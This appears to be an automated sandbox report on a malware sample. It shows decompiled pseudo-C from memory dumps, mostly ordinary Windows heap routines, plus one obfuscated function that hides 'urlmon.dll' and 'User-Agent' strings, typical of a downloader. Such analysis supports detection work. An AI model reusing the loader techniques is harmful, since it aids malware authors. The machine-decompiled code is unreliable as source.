										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E0296FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x2a4b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0299B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E0298F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x2a4b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x2a4b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E02A2E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E02A2E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E02A2E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E0297FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E02A2E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x02a2e833
0x02a2e839
0x02a2e83e
0x02a2e841
0x02a2e848
0x02a2e84b
0x02a2e851
0x02a2e8b2
0x02a2e8b2
0x02a2e8b5
0x02a2e90b
0x02a2e911
0x02a2e913
0x02a2e913
0x02a2e91a
0x02a2e91d
0x02a2e922
0x02a2e924
0x02a2e924
0x02a2e924
0x02a2e92f
0x02a2e933
0x02a2e935
0x02a2e93a
0x02a2e940
0x02a2e948
0x02a2e950
0x02a2e955
0x00000000
0x00000000
0x02a2e957
0x02a2e95c
0x02a2e9cb
0x02a2e9d2
0x02a2e9d4
0x02a2e9f2
0x02a2e9f6
0x02a2ea10
0x02a2ea18
0x02a2ea1a
0x02a2ea1f
0x02a2ea2c
0x02a2ea2d
0x02a2ea2e
0x02a2ea32
0x02a2ea3d
0x02a2ea42
0x02a2ea45
0x02a2ea51
0x02a2ea60
0x02a2ea65
0x02a2ea68
0x02a2ea6a
0x02a2ea6a
0x02a2ea6a
0x02a2ea6f
0x02a2ea76
0x02a2ea7c
0x02a2ea7e
0x02a2ea81
0x02a2ea85
0x02a2ea88
0x02a2ea8c
0x02a2ea8f
0x02a2ea93
0x02a2ea98
0x00000000
0x00000000
0x02a2ea9a
0x02a2ea9d
0x02a2eaa2
0x02a2eb0e
0x02a2eb15
0x02a2eb17
0x02a2eb33
0x02a2eb36
0x02a2eb39
0x02a2eb3f
0x02a2eb45
0x02a2eb4a
0x02a2eb52
0x02a2ecb1
0x02a2ecb9
0x02a2ecbe
0x02a2ecc3
0x02a2ecc6
0x02a2eceb
0x02a2ecee
0x02a2ecf9
0x02a2ecfe
0x02a2ed00
0x02a2ed05
0x02a2ed07
0x02a2ed0a
0x02a2ed0c
0x02a2ed0e
0x02a2ed12
0x02a2ed19
0x02a2ed1e
0x02a2ed24
0x02a2ed2a
0x02a2ed2a
0x02a2ed2c
0x02a2ed3e
0x02a2ed3e
0x02a2eb5a
0x02a2eb62
0x02a2eb69
0x00000000
0x00000000
0x02a2eb6f
0x02a2eb75
0x02a2eb79
0x02a2eb79
0x02a2eb88
0x02a2eb8e
0x02a2eb90
0x02a2eb92
0x02a2eb97
0x02a2ed3f
0x02a2ed45
0x00000000
0x00000000
0x02a2ed4b
0x02a2ed4e
0x00000000
0x02a2eb9d
0x02a2eb9d
0x02a2eb9d
0x02a2eba2
0x02a2ebb5
0x02a2ebbc
0x02a2ebbe
0x02a2ebbe
0x02a2ebc3
0x02a2ebc5
0x02a2ebcb
0x02a2ebd2
0x02a2ebd5
0x02a2ebdb
0x02a2ebdf
0x02a2ebe1
0x02a2ebf0
0x02a2ebf9
0x02a2ec04
0x02a2ec07
0x02a2ec0a
0x02a2ec82
0x02a2ec85
0x02a2ec8b
0x02a2ec91
0x02a2ec93
0x02a2ec96
0x02a2ec9b
0x02a2eca6
0x02a2ecac
0x02a2ecae
0x02a2ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x02a2ec0c
0x02a2ec0c
0x02a2ec0c
0x02a2ec0f
0x02a2ec12
0x02a2ec15
0x02a2ec15
0x02a2ec18
0x02a2ec1e
0x00000000
0x00000000
0x02a2ec22
0x02a2ec28
0x02a2ec4b
0x02a2ec5b
0x02a2ec5d
0x02a2ec63
0x02a2ec65
0x02a2ec68
0x02a2ec6b
0x02a2ec6b
0x02a2ec70
0x02a2ec71
0x02a2ec74
0x02a2ec7d
0x00000000
0x02a2ebe3
0x02a2ebe3
0x02a2ebe6
0x02a2ebe6
0x02a2ebe7
0x02a2ebe9
0x02a2ebec
0x00000000
0x02a2ebe6
0x02a2ebe1
0x02a2eba4
0x02a2eba9
0x02a2ebb0
0x02a2ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x02a2ebab
0x02a2ebab
0x02a2ebab
0x02a2ebac
0x02a2ebac
0x00000000
0x02a2ebab
0x02a2eb97
0x02a2eb19
0x02a2eb1c
0x02a2eb21
0x02a2eb26
0x02a2eb2c
0x02a2eb2c
0x00000000
0x02a2eb26
0x02a2ead6
0x02a2ead9
0x02a2eadc
0x02a2eadc
0x02a2eadc
0x02a2eade
0x02a2eae4
0x00000000
0x00000000
0x02a2eaee
0x02a2eaf7
0x02a2eaf9
0x00000000
0x00000000
0x02a2eb04
0x02a2eb12
0x00000000
0x02a2eb12
0x02a2eb06
0x00000000
0x02a2eb06
0x02a2eaf0
0x02a2eaf2
0x02a2eaf4
0x00000000
0x02a2eaf4
0x02a2ea6a
0x02a2ea21
0x00000000
0x02a2ea21
0x02a2e9d6
0x02a2e9d6
0x02a2e9e0
0x02a2e9e2
0x02a2e9e2
0x02a2e9e8
0x00000000
0x02a2e9e8
0x02a2e987
0x02a2e98f
0x02a2e992
0x02a2e995
0x02a2e995
0x02a2e998
0x02a2e998
0x02a2e99a
0x02a2e9a0
0x00000000
0x00000000
0x02a2e9a9
0x02a2e9b2
0x02a2e9b4
0x00000000
0x00000000
0x02a2e9ba
0x02a2e9c1
0x02a2e9cf
0x00000000
0x02a2e9cf
0x02a2e9c3
0x00000000
0x02a2e9c3
0x02a2e9ab
0x02a2e9ad
0x02a2e9af
0x00000000
0x02a2e9af
0x02a2e924
0x02a2e8b7
0x02a2e8ba
0x02a2e902
0x02a2e908
0x02a2e90a
0x00000000
0x02a2e90a
0x02a2e8bc
0x02a2e8bf
0x02a2e8f9
0x02a2e8ff
0x02a2e901
0x00000000
0x02a2e901
0x02a2e8c1
0x02a2e8c4
0x02a2e8f0
0x02a2e8f6
0x02a2e8f8
0x00000000
0x02a2e8f8
0x02a2e8c6
0x02a2e8c9
0x02a2e8e7
0x02a2e8ed
0x02a2e8ef
0x00000000
0x02a2e8ef
0x02a2e8cb
0x02a2e8ce
0x02a2e8de
0x02a2e8e4
0x02a2e8e6
0x00000000
0x02a2e8e6
0x02a2e8d3
0x00000000
0x02a2e8d5
0x02a2e8db
0x02a2e8dd
0x00000000
0x02a2e8dd
0x02a2e853
0x02a2e855
0x02a2e85b
0x02a2e85d
0x02a2e897
0x02a2e89c
0x02a2e8a2
0x02a2e8a6
0x02a2e8ab
0x02a2e8ad
0x02a2e8ad
0x00000000
0x02a2e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 02A2EA10
RtlDebugPrintTimes.NTDLL ref: 02A2ED24

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0e6455b5fc41264bc0a07b31ed25782194584948a9c9e9380f4830905c31a1fc
Instruction ID: af2b6cd8098cfc1375d34b81afdab9896006047fce500ab84a102746a61b98f1
Opcode Fuzzy Hash: 0e6455b5fc41264bc0a07b31ed25782194584948a9c9e9380f4830905c31a1fc
Instruction Fuzzy Hash: 5A02A172E006258BCB18CFADC9D167EFBF6EB88200B19856DD456EB780DB34E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000272CF, Relevance: 6.3, Strings: 5, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E000272CF(void* __eax, void* __ecx, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				char _v28;
				char _v29;
				char _v33;
				char _v34;
				short _v36;
				char _v40;
				intOrPtr _v44;
				signed char _t19;
				intOrPtr* _t28;
				intOrPtr _t36;
				void* _t41;
				intOrPtr* _t44;

				_t41 = __esi + 0xffffffd4;
				_t19 = __eax + 0x506b9d45 & 0x000000f3;
				asm("fiadd word [edx]");
				if(_t19 >= 0) {
					_push(_t41);
					__eflags = 0;
					_push(_t35);
					_t36 = _a4;
					_v33 = 0;
					_v29 = 0;
					_push(0xf);
					_push( &_v28);
					_push(_t36);
					_v12 = 0x104;
					_v44 = 0x6d6c7275;
					_v40 = 0x642e6e6f;
					_v36 = 0x6c6c;
					_v34 = 0;
					_v28 = 0x73550a0d;
					_v24 = 0x412d7265;
					asm("lock jb 0x31");
					_v16 = 0x746e6567;
					_v12 = 0x203a;
					E0002B7D0();
					_t15 =  &_v40; // 0x6d6c7275
					_t44 = E00024E10(_a4 + 0xc94, E0001ACC0(__eflags, _a4 + 0xc94, _t15), 0, 0, 0x69767207);
					__eflags = _t44;
					if(_t44 == 0) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						_t16 =  &_v8; // 0x8ade81e1
						_t28 =  *_t44(0, E0002BAA0(_t36) + _t36, _t16);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L6;
						} else {
							return 1;
						}
					}
				} else {
					asm("fst dword [ecx]");
					asm("in eax, 0x10");
					return _t19;
				}
			}

0x000272cf
0x000272d8
0x000272da
0x000272dc
0x000272f6
0x000272f7
0x000272f9
0x000272fa
0x000272fd
0x00027300
0x00027303
0x00027308
0x00027309
0x0002730a
0x00027311
0x00027318
0x0002731f
0x00027325
0x00027329
0x00027330
0x00027332
0x00027337
0x0002733e
0x00027345
0x0002734d
0x0002736d
0x00027372
0x00027374
0x00027399
0x0002739a
0x000273a0
0x00027376
0x00027376
0x00027388
0x0002738a
0x0002738c
0x00000000
0x0002738e
0x00027398
0x00027398
0x0002738c
0x000272de
0x000272de
0x000272e0
0x000272ec
0x000272ec

Strings

urlmon.dll, xrefs: 0002734D, 00027350
: , xrefs: 0002733E
gent, xrefs: 00027337
er-A, xrefs: 00027330
Us, xrefs: 00027329

Memory Dump Source

Source File: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000002.00000002.357982830.0000000000010000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Us$: $er-A$gent$urlmon.dll
API String ID: 0-1367105278
Opcode ID: 3db84e7f666cea8230fe0893f22acf53f1e6c1f6fd937aeb32aeb19033c0923b
Instruction ID: 1272f2e05d047783fa5a745e80fa1c5c41de85f5af83722dabb49ef7862d4b1f
Opcode Fuzzy Hash: 3db84e7f666cea8230fe0893f22acf53f1e6c1f6fd937aeb32aeb19033c0923b
Instruction Fuzzy Hash: DD11AEB2E01219AAEB00CF959C02BFEF7B8EF52714F000159ED08BB281D3759A0187E6

Uniqueness

Uniqueness Score: -1.00%

Function 029540E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E029540E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0295B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0295B150(", passed to %s", _t29);
					}
					_push("\n");
					E0295B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x2a46378 = 1;
						asm("int3");
						 *0x2a46378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x029540e6
0x029540e8
0x029540f1
0x029b042d
0x029b044c
0x029b0451
0x029b042f
0x029b0444
0x029b0449
0x029b045d
0x029b0466
0x029b046e
0x029b0474
0x029b0475
0x029b047a
0x029b048a
0x029b048c
0x029b0493
0x029b0494
0x029b0494
0x00000000
0x029b049b
0x00000000

Strings

HEAP: , xrefs: 029B044C
Invalid heap signature for heap at %p, xrefs: 029B0458
, passed to %s, xrefs: 029B0469
RtlAllocateHeap, xrefs: 029B0468
HEAP[%wZ]: , xrefs: 029B043F

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: cbd086f049b5a2ad7b7d6537c6e2375f63674407e9fb9adb7ddc2c6eeeec6f6f
Instruction ID: 81c197f865f000c72a730fc3dd4401cb626e9dcfb6167241a57ffcb400dce10b
Opcode Fuzzy Hash: cbd086f049b5a2ad7b7d6537c6e2375f63674407e9fb9adb7ddc2c6eeeec6f6f
Instruction Fuzzy Hash: B0012832214290AEF316DB78A51DFD777AEDFC1F34F188069F4094B6C09BA49480CE24

Uniqueness

Uniqueness Score: -1.00%

Function 0297B73D, Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0297B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E02A1A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x2a48748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E0295B150();
					} else {
						E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E0295B150();
					__eflags =  *0x2a47bc8;
					if(__eflags == 0) {
						E02A12073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E02A1A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x2a48720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x2a48720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E0297B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E02A1A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E0297E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x0297b746
0x0297b74b
0x0297b74d
0x0297b750
0x0297b755
0x0297b758
0x0297b758
0x0297b75e
0x0297b763
0x0297b764
0x0297b76a
0x0297b76d
0x0297b771
0x0297b776
0x0297b85c
0x0297b85d
0x0297b860
0x0297b865
0x029c2ba1
0x029c2ba2
0x029c2ba9
0x029c2bae
0x029c2bae
0x0297b77c
0x0297b77c
0x0297b77c
0x0297b785
0x0297b788
0x029c2bb6
0x029c2bb9
0x00000000
0x00000000
0x029c2bbf
0x029c2bc5
0x029c2bc9
0x029c2be8
0x029c2bed
0x029c2bcb
0x029c2be0
0x029c2be5
0x029c2bf3
0x029c2bf8
0x029c2bfd
0x029c2c05
0x029c2c0e
0x029c2c0e
0x00000000
0x0297b78e
0x0297b78e
0x0297b78e
0x0297b791
0x0297b791
0x0297b797
0x0297b797
0x0297b79f
0x0297b7a9
0x0297b7af
0x0297b7af
0x0297b7b1
0x0297b7b6
0x0297b7e2
0x0297b7e2
0x0297b7e7
0x0297b880
0x0297b7ed
0x0297b7ed
0x0297b7ed
0x0297b7ef
0x0297b7f2
0x0297b7f2
0x0297b7f5
0x0297b7fa
0x029c2c2d
0x029c2c2e
0x029c2c39
0x0297b800
0x0297b800
0x0297b802
0x0297b805
0x0297b808
0x0297b808
0x0297b80a
0x0297b80d
0x0297b816
0x0297b81c
0x0297b822
0x0297b82f
0x0297b88b
0x0297b892
0x0297b897
0x0297b899
0x0297b89b
0x0297b89e
0x0297b8a5
0x0297b8a8
0x0297b8aa
0x0297b8ac
0x0297b8ac
0x0297b8aa
0x0297b892
0x0297b831
0x0297b839
0x0297b83b
0x0297b83b
0x0297b844
0x0297b84b
0x0297b852
0x0297b7b8
0x0297b7ba
0x0297b7bf
0x0297b7c4
0x029c2c18
0x029c2c19
0x029c2c23
0x0297b7ca
0x0297b7ca
0x0297b7cc
0x0297b7cf
0x0297b7d1
0x0297b7d1
0x0297b7d4
0x0297b7dc
0x0297b8bb
0x0297b8bb
0x0297b8be
0x0297b8be
0x0297b8c1
0x00000000
0x00000000
0x0297b8c3
0x0297b8c5
0x0297b8c7
0x0297b8e0
0x00000000
0x0297b8e0
0x0297b8cc
0x0297b8cc
0x00000000
0x0297b8cc
0x0297b8d6
0x0297b8d6
0x00000000
0x0297b7dc
0x0297b7b6

Strings

HEAP: , xrefs: 029C2BE8
